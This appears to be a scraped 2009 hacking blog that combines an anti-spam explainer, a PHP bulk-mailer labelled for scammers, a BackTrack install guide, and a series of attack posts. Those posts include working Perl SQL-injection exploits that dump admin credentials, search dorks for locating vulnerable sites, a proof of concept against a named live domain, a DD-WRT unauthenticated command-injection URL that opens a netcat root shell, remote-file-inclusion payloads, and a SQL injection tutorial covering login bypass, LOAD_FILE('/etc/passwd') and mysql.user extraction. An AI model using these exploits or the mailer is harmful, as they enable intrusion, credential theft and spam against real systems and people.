These spam come only from spammers and never from a legitimate user or a company. These spammers send a single email to hundreds (some times thousands or millions) of email addresses at a time. They either send it manually or use spambots to automate the process of spamming.

Why do spammers SPAM?

The main goal of spammers is to send the spam (unsolicited bulk messages) to as many people as possible in order to make profit. For example, John builds a small website to sell an ebook which gives information about weight loss. In order to make sales he needs publicity for his website. Instead of spending money on advertising, John decides to create an email which contains information about his site along with it’s link and send this email to say 100 email addresses in his contact list. If 1 person out of hundred buy this book john gets $10. What if he sends this email to 1000s of email addresses. He gets $100. Imagine, if he sends this email to 1 Million email addresses he gets $100000.

Now I hope you understood the idea behind spamming. So in order to make money, spammers send their advertising emails to as many people as possible without respecting the recipient’s privacy.

From where do SPAMmers get my email address?

On the Internet there exists many sites who collect the email IDs of people and sell them to spammers in bulk. Most often, people sign up for monthly newsletters and take up surveys. This is the time where these scam sites get their email addresses. Also many spammers collect email addresses by using spambots. These spambots collect email addresses from the Internet in order to build mailing lists. Such spambots are web crawlers that can gather email addresses from Web sites, newsgroups, forums, special-interest group (SIG) postings, and chat-room conversations.

Spammers also use the trick of creating Hoax Emails for gathering a huge list of email IDs. For example, a spammer sends a hoax email which says “Forward this Message to Help Severely Burned Child”. This email claims that 11 cents will be donated to the child’s family every time the message is sent to others. Most of the people believe this and start forwarding this hoax email to all of the IDs in their contact list. In this way the email spreads rapidly and eventually when it reaches the creator (spammer), the spammer gets a huge list of valid email addresses in the email header. When you get these kind of hoax emails, you can see for yourself in the email header which contains a huge list of email addresses of all those people to whom the email is being forwarded to. This is one of the effective methods used by spammers to gather email addresses.

Is SPAMming legal?

Spamming is completely illegal. Yet it is really difficult to stop spammers from spamming since they keep moving from one hosting company to another after getting banned. This makes it practically impossible to catch spammers and prosecute them.

How to protect my email account from getting SPAMmed?

The following methods can be used to combat email spam.

1. Use spam filters for your email account. If you’re using email services like Gmail, Yahoo, Hotmail etc. then spam filters are used by defaut. Each spam filter has it’s algorithm to detect spam emails and will automatically move them to SPAM folder. This keeps your inbox free from spam. However some spam emails become successful to make their way into the inbox by successfully bypassing the filters.

2. Do not post your email address in public forums, user comments and chat-rooms. Give your email address only to trustworthy websites while signing up for newsletters.

3. While taking up online surveys and filling up feedback forms, it is better not to give your personal email address. Instead singup for a dummy email account and use this for surveys and feedback forms.

4. While posting your contact email address on your website use this format: emailaddress [at] yoursite.com instead of emailaddress@yoursite.com. This protects your email address from being indexed by spambots.

5. Do not respond to hoax messages. When you receive a hoax email, avoid forwarding it to your friends. Examples of hoax messages can be found at www.hoax-slayer.com. If you really want to forward it to your friends, make sure that you use “Bcc” (blind certified copy) option to send the email. This will hide all the email IDs to which the mail is forwarded to.

I hope this helps

php mailer script for scammer

2009-08-26T20:14:00.000-07:00

if ($action=="send"){
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>

Your Email:
Your Name :
Reply-To :
Attach File :
Subject :
Message :	<? print $message; ?>
To :	<? print $emaillist; ?>
Plain HTML

if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
#Open the file attachment if any, and base64_encode it for email transport
If ($file_name){
@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server");
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to.......";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print " Message Sent!
";
flush();
}
}
}
exit;
?>

How to make a Backtrack 4 Hard Drive Installation -

2009-08-25T20:38:00.000-07:00

Backtrack 4 does not contain any installer yet thus we wrote this step by step guide based on muts cookbook on how to install Backtrack 4 on our hard disk drive.

Step 1 - Creating the partitions

First we will need to create three partitions to be able to install backtrack on our hard disk drive. We will need boot, swap and root partitions to be created. (We can still create 2 partitions and install the boot inside the root partition)

After we create the three partitions we need to change the type of partition 2 to swap and activate the boot partition, then write the changes

Command (m for help): t
Partition number (1-4): 2
Hex code (type L to list codes): 82
Changed system type of partition 2 to 82 (Linux swap / Solaris)
Command (m for help): a
Partition number (1-4): 1
Command (m for help): w
The partition table has been altered!
Calling ioctl() to re-read partition table.
Syncing disks.
root@bt:~#

Step 2 - Format the file systems

We format our file system with mkreiserfs for root partition, ext2 for boot and swap for the swap partition.

\

Step 3 - Mount and Copy Directories

After we had prepare the file systems its time to copy over the backtrack files to our hard drive and configure it to run the backtrack on boot.

NOTE: The copy operation will take some time so be patient until it finish

Step 4 - Configure Bootloader

We will need to configure /etc/lilo.conf and define the boot and root partition so we will be able to boot into backtrack. In case we do not correctly define the root partition we will get an error “Kernel panic: no init found”.

Edit /etc/fstab and append the following lines:

/dev/sda3 / reiserfs defaults 0 0 # AutoUpdate
/dev/sda2 none swap sw 0 0

Execute lilo -v and reboot

References:

http://www.offensive-security.com/documentation/bt4install.pdf
http://www.itsolutionskb.com/2009/04/how-to-install-nessus-on-backtrack-4
http://www.itsolutionskb.com/2009/04/backtrack-4-beta-quick-fixes
VN:F [1.6.2_892]

Ed Charkow's Supercharged Linking Blind SQL Injection Exploit

2009-08-25T20:37:00.001-07:00

#!/usr/bin/perl

#==========================================================================================#
#
# [o] Ed Charkow's Supercharged Linking Blind SQL Injection Exploit
# Software : Ed Charkow's Supercharged Linking
# Buy Script : http://www.infodepot3000.com/Scripts/content/supercharged_linking.html
# Author : NoGe
# Contact : noge[dot]code[at]gmail[dot]com
# Blog : http://evilc0de.blogspot.com
#
# [o] Usage
# root@noge:~# perl link.pl
#
# [x]============================================================[x]
# | Ed Charkows Supercharged Linking Blind SQL Injection Exploit |
# | [F]ound by NoGe [C]oded by Vrs-hCk |
# [x]============================================================[x]
#
# [+] URL Path : www.target.com/[path]
# [+] Valid ID : 1
#
# [!] Exploiting http://www.target.com/[path]/ ...
#
# [+] SELECT password FROM admin LIMIT 0,1 ...
# [+] md5@password> de9e3ae793d300ce7ee4742d4513cb06
#
# [!] Exploit completed.
#
# root@noge:~#
#
# crack the hash and login with username admin
#
# [o] Greetz
# MainHack BrotherHood [ http://mainhack.net ]
# Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang aJe
# H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
# skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
#
#==========================================================================================#

AJ Auction Pro OOPD 2.x SQL Injection Exploit

2009-08-16T21:15:00.000-07:00

#!/usr/bin/perl

#********************************************************#
# #
# [o] AJ Auction Pro OOPD 2.x SQL Injection Exploit #
# Software : AJ Auction Pro OOPD 2.x #
# Vendor : http://www.ajsquare.com/ #
# Author : NoGe #
# Contact : noge[dot]code[at]gmail[dot]com #
# Blog : http://evilc0de.blogspot.com #
# #
# [o] Usage #
# root@noge:~# perl ajpro.pl www.target.com #
# #
# [o] Dork #
# "Powered By AJ Auction Pro" #
# #
# [o] Greetz #
# MainHack BrotherHood [ http://mainhack.net ] #
# Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang #
# H312Y yooogy mousekill }^-^{ loqsa zxvf martfella #
# skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke #
# #
#********************************************************#

use HTTP::Request;
use LWP::UserAgent;

my $target = $ARGV[0];
my $file_vuln = '/store.php?id=';
my $sql_query = '-null+union+select+1,2,3,4,5,group_concat(0x3a,user_name,0x3a,password,0x3a),7,8,9,10+from+admin--';
print "\n[x]===============================================[x]\n";
print "[x] AJ Auction Pro OOPD 2.x SQL Injection Exploit [x]\n";
print "[x] [C]oded By NoGe [x]\n";
print "[x]===============================================[x]\n\n";

my $exploit = "http://".$target.$file_vuln.$sql_query;

my $request = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/:(.*):(.*):/g) {
my ($username,$password) = ($1,$2);
print "[+] $username:$password \n\n";
}
else { print "[-] Error, Fail to get admin login.\n\n"; }
}
else { print "[-] Error, ".$response->status_line."\n\n"; }

BrooWaha Engine 2.0.71 SQL Injection Vuln

2009-08-16T21:10:00.000-07:00

[o] BrooWaha Engine 2.0.71 SQL Injection Vulnerability
Software : BrooWaha Engine 2.0.71
Vendor : http://www.broowaha.com/
Author : NoGe

[o] Vulnerable file
image.php

[o] Exploit
http://localhost/[path]/image.php?id==[SQL]

[o] Proof of concept
http://london.broowaha.com/image.php?id=-5851+AND+1=2+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),1/*

[o] Dork
"Powered by BrooWaha Engine"

[o] Note
if you dont see the result, view the page source and you will see it. :)
the result from the example above will be like this after you view the page source.
4.0.27-max-log:db162098511:dbo162098511@74.208.16.88/-5851
this is a private script and all target are in one IP address.

DD-WRT (httpd service) Remote Command Execution Vulnerability

2009-08-13T05:06:00.000-07:00

This artikel take form milw0rm, for more information just look on http://www.milw0rm.com/exploits/9209

This is a remote root vulnerability in DD-WRT's httpd server. The bug exists
at the latest 24 sp1 version of the firmware.

The problem is due to many bugs and bad software design decisions. Here is
part of httpd.c:

859 if (containsstring(file, "cgi-bin")) {
860
861 auth_fail = 0;
862 if (!do_auth
863 (conn_fp, auth_userid, auth_passwd, auth_realm,
864 authorization, auth_check))
865 auth_fail = 1;

......... (snip)............

899
900 }
901 exec = fopen("/tmp/exec.tmp", "wb");
902 fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
903 if (query)
904 fprintf(exec, "/bin/sh %s/%s905 server_dir != NULL ?
server_dir : "/www",file);
906 else
907 fprintf(exec, "/%s/%s\n",
908 server_dir != NULL ? server_dir : "/www",
file);
909 fclose(exec);
910
911 if (query) {
912 exec = fopen("/tmp/exec.query", "wb");
913 fprintf(exec, "%s\n", query);

........................
Two issues there:
1) No metacharacters handling
2) Command gets executed even without successful authentication.
You are not going to see any output if not authenticated though.
.......................

914 free(query);
915 fclose(exec);
916 }
917
918 system2("chmod 700 /tmp/exec.tmp");
919 system2("/tmp/exec.tmp>/tmp/shellout.asp");

........... (snip)..........

926 if (auth_fail == 1) {
927 send_authenticate(auth_realm);
928 auth_fail = 0;

------------

3) issue 3: httpd runs as root :)

Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can
connect to the management web interface can get easily root on the device via
his browser with an URL like:

http://routerIP/cgi-bin/;command_to_execute

There is a catch though: whitespaces break it. Anyway, they can be easily
replaced with shell variable like $IFS. So, getting root shell at 5555/tcp
becomes as easy as typing this in your browser's url bar:

http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh

Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the
problem:
http://www.youtube.com/watch?v=UhDcXCVFrvM

Fortunately, httpd by default does not listen on the outbound interface.
However, this vulnerability can be exploited via a CSRF attack (the dd-wrt
device's owner does not even need to have an authenticated session on the web
UI which is bad, bad). However, a base authentication dialog will appear. In
IE even this can be supressed, see this one:

http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/

Unlike the already documented CSRF vulnerability (
http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated
session. This means someone can even post some crafted [img] link on a forum
and a dd-wrt router owner visiting the forum will get owned :)

A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I
would say :)

Remote File Inclusion

2009-08-09T00:32:00.000-07:00

Take a look of the following code:

[...]

include($_GET['pag']);

[...]

?>

As we can see, $page is not validated before being used so a malicious user could
include or call (as you prefer to say) his script via the browser and gain access
to the machine or view, as before, a file.

Example one: (gain access to the machine)

http://remote_host/inc.php?pag=[Evil Script - our shell located on our server]

Example two: (view files)

http://remote_host/inc.php?pag=/etc/passwd

Patching

The solution? validate the input. One of lots of methods to validate inputs
would be to create a list of acceptable pages as shown below:

$pag = $_GET['pag'];

$pages = array('index.php', 'alfa.php', 'beta.php', 'gamma.php');

if(in_array($pag, $pages))
{
include($pag);
{
else
{
die("Hacking Attempt!");
}

MAXcms - Databay Content Management System 3.11.20b Multiple RFI Vuln

2009-08-08T01:26:00.001-07:00

[o] MAXcms - Databay Content Management System 3.11.20b Multiple Remote File Inclusion Vulnerability
Software : MAXcms - Databay Content Management System version 3.11.20b
Vendor : http://www.databay.de
Download : http://downloads.sourceforge.net/micro-cms/microcms.zip
Author : NoGe

[o] Vulnerable file
is_projectPath parameter
includes/InstantSite/inc.is_root.php

GLOBALS[thCMS_root] parameter
classes/class.Tree.php
includes/inc.thcms_admin_mediamanager.php
modul/mod.rssreader.php

is_path parameter
classes/class.tasklist.php
classes/class.thcms.php
classes/class.thcms_content.php
classes/class.thcms_modul_parent.php
classes/class.thcms_page.php
classes/class.thcsm_user.php
includes/InstantSite/class.Tree.php

thCMS_root parameter
classes/class.thcms_modul.php
includes/inc.page_edit_tasklist.php
includes/inc.thcms_admin_overview_backup.php
includes/inc.thcms_edit_content.php
modul/class.thcms_modul_parent_xml.php
modul/mod.cmstranslator.php
modul/mod.download.php
modul/mod.faq.php
modul/mod.guestbook.php
modul/mod.html.php
modul/mod.menu.php
modul/mod.news.php
modul/mod.newsticker.php
modul/mod.rss.php
modul/mod.search.php
modul/mod.sendtofriend.php
modul/mod.sitemap.php
modul/mod.tagdoc.php
modul/mod.template.php
modul/mod.test.php
modul/mod.text.php
modul/mod.upload.php
modul/mod.users.php

[o] Exploit
http://localhost/[path]/includes/InstantSite/inc.is_root.php?is_projectPath=[evilc0de]
http://localhost/[path]/classes/class.Tree.php?GLOBALS[thCMS_root]=[evilc0de]
http://localhost/[path]/classes/class.thcsm_user.php?is_path=[evilc0de]
http://localhost/[path]/modul/mod.users.php?thCMS_root=[evilc0de]

MySQL: Secure Web Apps - SQL Injection techniques

2009-08-05T22:33:00.000-07:00

-[ SUMMARY ]---------------------------------------------------------------------
0x01: Introduction
0x02: Injecting SQL
0x03: Exploiting a Login Form
0x04: Exploiting Different SQL Statement Type
0x05: Basic Victim Fingerprinting
0x06: Standard Blind SQL Injection
0x07: Double Query
0x08: Filters Evasion
0x09: SQL Injection Prevention
0x10: Conclusion
---------------------------------------------------------------------------------

---[ 0x01: Introduction ]

Hi everybody! I'm here again to write a little, but I hope interesting, paper concerning
Web Application Security. The aim of these lines are to help you to understand security
flaws regarding SQL Injection.

I know that maybe lots of things here explained are a little bit old; but lots of people
asked to me by email how to find/to prevent SQL Injection flaws in their codes.

Yes, we could say that this is the second part of my first paper regarding PHP flaws
(PHP Underground Security) wrote times ago; where I explained in a very basic form the SQL Injection
(The reason? The focus was on an other principal theme).

How I wrote this paper? In my free time, a couple of lines to help people to find, prevent
this kind of attacks. I hope you enjoy it. For any question or whatever please
contact me here: omni_0 [at] yahoo [DOT] com .
-------------------------------------------------------------------------------[/]

---[ 0x02: Injecting SQL ]

As you know almost every dynamic web applications use a database (here we talk
about web application based on "LAMP architecture") to store any kind of data needed
by the application such as images path, texts, user accounts, personal information,
goods in stock, etc.

The web application access to those information by using the SQL (Structured Query
Language). This kind of applications construct one or more SQL Statement to query
the DataBase (and for example to retrieve data); but this query sometimes incorporporate
user-supplied data. (take in mind this)

What about SQL? SQL is a DML (Data Manipulation Language) that is used
to insert, retrive and modify records present in the DataBase.

As I said before web application uses user-supplied data to query the DB but if the
supplied data is not properly sanitized before being used this can be unsafe and
an attacker can INJECT HIS OWN SQL code.
These flaws can be very destructive because an attacker can:

- Inject his data
- Retrive information about users, CC, DBMS.. (make a kind of information gathering)
- and so on..

The fundamentals of SQL Injection are similar to lots of DBMS but, as you know
there are some differences, in this paper I will cover "Exploting SQL Injection
in MySQL DBMS" as said upon (this means that if you want to test techniques here
explained on others DBMS you need to try at your own).
-------------------------------------------------------------------------------[/]

---[ 0x03: Exploiting a Login Form ]

Sometimes happends that coders doesn't properly sanitize 2 important variables
such as user-name and password in the login form and this involve a critical
vulnerability that will allow to the attacker the access to a reserved area.

Let's make an example query here below:

SELECT * FROM users WHERE username = 'admin' and password = 'secret'

With this query the admin supply the username 'admin' and the password 'secret'
if those are true, the admin will login into the application.
Let us suppose that the script is vulnerabile to sql injection; what happends
if we know the admin username (in this case 'admin')? We don't know the password, but
can we make an SQL Injection attack? Yes, easily and then we can gain the access to the application.
In this way:

SELECT * FROM users WHERE username = 'admin' /*' and password = 'foobar'

So, we supplied this information:

- As username = admin' /*
- As password = foobar (what we want..)

Yes, the query will be true because admin is the right username but then with the
' /* ' symbol we commented the left SQL Statement.

Here below a funny (but true) example:

$sql = "SELECT permissions, username FROM $prefix"."auth WHERE
username = '" . $_POST['username'] . "' AND password = MD5('".$_POST['wordpass']."');";

$query = mysql_query($sql, $conn);

The variables passed with the POST method are not properly sanitized before being used
and an attacker can inject sql code to gain access to the application.
This is a simple attack but it has a very critical impact.
-------------------------------------------------------------------------------[/]

---[ 0x04: Exploiting Different SQL Statement Type ]

SQL Language uses different type of statements that could help the programmer to
make different queries to the DataBase; for example a SELECTion of record,
UPDATE, INSERTing new rows and so on. If the source is bugged an attacker can
"hack the query" in multiple ways; here below some examples.

SELECT Statement
------------------

SELECT Statement is used to retrieve information from the database; and is
frequentely used "in every" application that returns information in response
to a user query. For example SELECT is used for login forms, browsing catalog, viewing
users infos, user profiles, in search engines, etc. The "point of failure" is
often the WHERE clause where exactly the users put their supplied arguments.

But sometimes happends that the "point of failure" is in the FROM clause; this
happends very rarely.

INSERT Statement
------------------

INSERT statement is used to add new row in the table; and sometimes the application
doesn't properly sanitize the data, so a query like the beneath could be vulnerable:

INSERT INTO usr (user, pwd, privilege) VALUES ('new', 'pwd', 10)

What happends if the pwd or username are not safe? We can absolutely "hack the
query" and perform a new interesting query as shown below:

INSERT INTO usr (user, pwd, privilege) VALUES ('hacker', 'test', 1)/*', 3)

In this example the pwd field is unsafe and is used to create a new user with
the admin privilege (privilege = 1):

$SQL= "INSERT INTO usr (user, pwd, id) VALUES ('new', '".$_GET['p']."', 3)";

$result = mysql_query($SQL);

UPDATE Statement
------------------

UPDATE statement is used (as the word says) to UPDATE one or more records.
This type of statement is used when users (logged into the application) need
to change their own profile information; such as password, the billing address,
etc. An example of how the UPDATE statement works is shown below:

UPDATE usr SET pwd='newpwd' WHERE user = 'billyJoe' and password = 'Billy'

The field pwd in the update_profile.php form is absolutely "a user-supply data"; so,
try to imagine what happends if the code is like the (vulnerable) code pasted below:

$SQL = "UPDATE usr SET pwd='".$_GET['np']."' WHERE user = 'billyJoe' and pwd = 'Billy'";
$result = mysql_query($SQL);

In this query the password needs to be correct (so, the user needs to know his own password :D)
and the password will be supplied with the GET method; but leave out this detail (it's not so important
for our code injection) and concentrate to the new password field (supplied by $_GET['np'], that
is not sanitized); what happeds if we will inject our code here? Let see below:

UPDATE usr SET pwd='owned' WHERE user='admin'/*' WHERE user = 'ad' and pwd = 'se'

here we just changed the admin password to ' owned ' :) sounds interesting right?

UNION SELECT Statement
-------------------------

The "UNION SELECT Statement" is used in SQL to combine the results of 2
or more different SELECT query; obviously in one result.
This kind of statement is very interesting because when you have a SELECT query
often you can add your own UNION SELECT statement to combine the queries (sure,
only if you have a "bugged sql statement") and view the 2 (or more) results in only
one result set. To better understand what I mean I think is better to see an interesting
example and put our hands on it.

Here is our vulnerable code:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

$SQL = "select * from news where id=".$_GET['id'];

$result = mysql_query($SQL);

if (!$result) {
die('Invalid query: ' . mysql_error());
}

// Our query is TRUE
if ($result) {
echo '

WELCOME TO www.victim.net NEWS
';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {

echo '
Title:'.$row[1].'
';
echo '
News:
'.$row[2];
}

}

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

As we can see the $SQL variable is vulnerable and an attacker can inject his own
code into it and then gain interesting information. What happends if via browser we
call this URL: http://www.victim.net/CMS/view.php?id=1 ?

Nothing interesting, just our news with the ID equal to 1, here below:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

How to make this interesting? :) We can use our UNION SELECT operator, and the
resultant query will be:

select * from news where id=1 UNION SELECT * FROM usr WHERE id = 1

What is gonna happend? Look below:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?
Title:secret

News:
1

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

"Title: secret" is the admin password (ID = 1 is the admin in most cases) and the 1 in the "News:"
is the admin ID. So, why our output is so strange? This is not strange our tables has been made
in different ways. Just to make things clear look the tables below:

mysql> select * from usr;
-----------------------
| user | pwd | id |
-----------------------
| admin | secret | 1 |
-----------------------
| ad | aaaaa | 2 |
-----------------------
| new | test | 5 |
-----------------------

mysql> select * from news;
---------------------------------------------------
| id | title | texts |
---------------------------------------------------
| 1 | testing news | what about SQL Injection? |
---------------------------------------------------
| 2 | testing news 2 | could be bypassed easily? |
---------------------------------------------------

Our UNION SELECT query will be:

mysql> select * from news where id = 1 union select * from usr where id = 1;
---------------------------------------------------
| id | title | texts |
---------------------------------------------------
| 1 | testing news | what about SQL Injection? |
---------------------------------------------------
| admin | secret | 1 |
---------------------------------------------------

Is now clear? We have found the admin password. It's great!

Ok, lets go deeper; what happends if we have 2 tables with a different number of
columns? Unfortunaltely UNION SELECT doesn't work as show upon. I want to make
2 different examples to help you.

LESS FIELDS
------------

mysql> select * from Anews;
------------------------------------------------
| title | texts |
------------------------------------------------
| testing news 2 | could be bypassed easily? |
------------------------------------------------

mysql> select * from Anews union select * from usr;
ERROR 1222 (21000): The used SELECT statements have a different number of columns

Yes, this is what happends if the UNION SELECT is used and the tables have a different
number of columns. So, what we can do to bypass this?

mysql> select * from Anews union select id, CONCAT_WS(' - ', user, pwd) from usr;
--------------------------------------------
| title | texts |
--------------------------------------------
| testing news 2 | could be bypassed easily? |
--------------------------------------------
| 1 | admin - secret |
--------------------------------------------
| 2 | ad - aaaaa |
--------------------------------------------
| 5 | new - test |
--------------------------------------------

We bypassed "the problem" just using a MySQL function CONCAT_WS (CONCAT can be used too).
Take in mind that different DBMS works in different way. I'm explaining in a general manner; therefore
sometimes you have to find other ways. :)

MORE FIELDS
-------------

mysql> select * from fnews;
--------------------------------------------------------
| id | pri | title | texts |
--------------------------------------------------------
| 1 | 0 | testing news 2 | could be bypassed easily? |
--------------------------------------------------------

What we can do now? Easy, just add a NULL field!!

mysql> select * from fnews union select NULL, id, user, pwd from usr;
---------------------------------------------------------
| id | pri | title | texts |
---------------------------------------------------------
| 1 | 0 | testing news 2 | could be bypassed easily? |
---------------------------------------------------------
| NULL | 1 | admin | secre |
---------------------------------------------------------
| NULL | 2 | ad | aaaaa |
---------------------------------------------------------
| NULL | 5 | new | test |
---------------------------------------------------------

-------------------------------------------------------------------------------[/]

---[ 0x05: Basic Victim Fingerprinting ]

In this part of the paper I'll explain some easy, but interesting, ways used while trying to do
information gathering before the Vulnerability Assessment and Penetration Test steps.

This is our scenario: we found a bugged Web Application on the host and we can inject our
SQL code.

So, what we need to know? Could be interesting to know the mysql server version;
maybe it's a bugged version and we can exploit it.

How to do that? (I will not use bugged code; I'll just make some examples. Use your
mind to understand how to use "these tips")

mysql> select * from fnews WHERE id = 1 union select version(), NULL, NULL, NULL from usr;
-----------------------------------------------------------------------------
| id | pri | title | texts |
-----------------------------------------------------------------------------
| 1 | 0 | testing news 2 | could be bypassed easily? |
-----------------------------------------------------------------------------
| 5.0.22-Debian | NULL | NULL | NULL |
-----------------------------------------------------------------------------

Here our mysql version. Also the OS has been putted on the screen :) (take in mind that
sometimes these information are modified).

Could be interesting to know the server time:

mysql> select * from fnews WHERE id = 1 union select NOW(), NULL, NULL, NULL from usr;
---------------------------------------------------------------------------
| id | pri | title | texts |
---------------------------------------------------------------------------
| 1 | 0 | testing news 2 | could be bypassed easily? |
---------------------------------------------------------------------------
| 2009-02-27 00:03:56 | NULL | NULL | NULL |
---------------------------------------------------------------------------

Yes, sometimes is useful to know what is the user used to connect to the database.

mysql> select * from fnews WHERE id = 1 union select USER(), NULL, NULL, NULL from usr;

--------------------------------------------------------------------
| id | pri | title | texts |
--------------------------------------------------------------------
| 1 | 0 | testing news 2 | could be bypassed easily? |
--------------------------------------------------------------------
| omni@localhost | NULL | NULL | NULL |
--------------------------------------------------------------------

An interesting function implemented in mysql server is LOAD_FILE that, as the
word say, is able to load a file. What we can do with this? gain information and
read files. Here below the query used as example:

select * from news where id=1 union select NULL,NULL,LOAD_FILE('/etc/passwd') from usr;

This is what my FireFox shows to me:

http://www.victim.net/CMS/view.php?id=1%20union%20select%20NULL,NULL,LOAD_FILE('/etc/password')%20from%20usr;

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?
Title:

News:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]
[output cutted]
[...]

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

Sounds interesting right, don't you?

Could be interesting to get some sensitive information such as mysql users and passwords
right? By injecting our code as shown below we can get such that information.

SELECT * FROM news WHERE id='1' UNION SELECT Host, User, Password FROM mysql.user/*'
-------------------------------------------------------------------------------[/]

---[ 0x06: Standard Blind SQL Injection ]

SQL Injection and Blind SQL Injection are attacks that are able to exploit a software
vulnerability by injecting sql codes; but the main difference between these attacks
is the method of determination of the vulnerability.

Yes, because in the Blind SQL Injection attacks, attacker will look the results
of his/her requests (with different parameter values) and if these results will return
the same information he/she could obtain some interesting data. (I know, it seems
a bit strange; but between few lines you will understand better).

But why Standard Blind SQL Injection? What does it mean? In this part of the paper
I'll explain the basic way to obtain information with Blind SQL Injection without bear
in mind that this type of attacks could be optimized. I don't wanna talk about the
methods to optimize a Blind SQL Injection attack.(Wisec found interesting things about that -
"Optimizing the number of requests in blind SQL injection").

Ok, let's make a step forward and begin talking about Detection of Blind SQL Injection.
To test this vulnerability we have to find a condition that is always true; for example
1=1 is always TRUE right? Yes, but when we have to inject our code in the WHERE
condition we don't know if our new injected query will be true or false; therefore
we have to make some tests. When the query is true? The query is true when the record
returned contain the correct information. Maybe is a little bit strange this explanation but
to make things clear I wanna let you see an example. Suppose that we requested this
URL:

http://www.victim.net/CMS/view.php?id=1

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

As you can see we have just viewed our first news (id=1). What happends if we request
this other URL: http://www.victim.net/CMS/view.php?id=1 AND 1=1 ?
In our browser we just see the same page because the query is obviously true.
Here below the injected query:

SELECT * FROM news WHERE id=1 AND 1=1 LIMIT 1

Now, we (I hope) have understood what is a Blind SQL Injection; and to understand
better how we can use this, I want to make a simple example/scenario. I'm thinking that
the web application is connected to MySQL using the user omni; how to know this by using
Blind SQL Injection? Just requesting this URL:

http://www.victim.net/CMS/view.php?id=1 AND USER()=omni@localhost'

and watch the reply sent on our browser. If in our FireFox (or whatever you want)
we will see the news with ID=1 we know that omni is the user used to connect to
the mysql deamon (because the query is true; and we found the true value to pass
to the query).
Let's go deeper. What we can do with Blind SQL? Could be interesting to retrieve
the admin password. How to do that? First of all to understand better the
steps I'm going to explain we need to know some basic information.

Function used in MySQL:

- ASCII(str)
Returns the numeric value of the leftmost character of the string str.
Returns 0 if str is the empty string. Returns NULL if str is NULL. ASCII()
works for 8-bit characters.

mysql> select ascii('a');
-----------
| ascii('A') |
-----------
| 97 |
-----------

mysql> select ascii('b');
-----------
| ascii('b') |
-----------
| 98 |
-----------

- ORD(str)

If the leftmost character of the string str is a multi-byte character, returns
the code for that character, calculated from the numeric values of its constituent
bytes using this formula:

(1st byte code)
+ (2nd byte code x 256)
+ (3rd byte code x 2562) ...

If the leftmost character is not a multi-byte character, ORD() returns the same value as
the ASCII() function.

- SUBSTRING(str,pos), SUBSTRING(str FROM pos),
SUBSTRING(str,pos,len), SUBSTRING(str FROM pos FOR len)

The forms without a len argument return a substring from string str starting at position pos.
The forms with a len argument return a substring len characters long from string str, starting
at position pos.
The forms that use FROM are standard SQL syntax. It is also possible to use a negative value
for pos. In this case, the beginning of the substring is pos characters from the end of the
string, rather than the beginning.
A negative value may be used for pos in any of the forms of this function.

- SUBSTR(str,pos), SUBSTR(str FROM pos),
SUBSTR(str,pos,len), SUBSTR(str FROM pos FOR len)

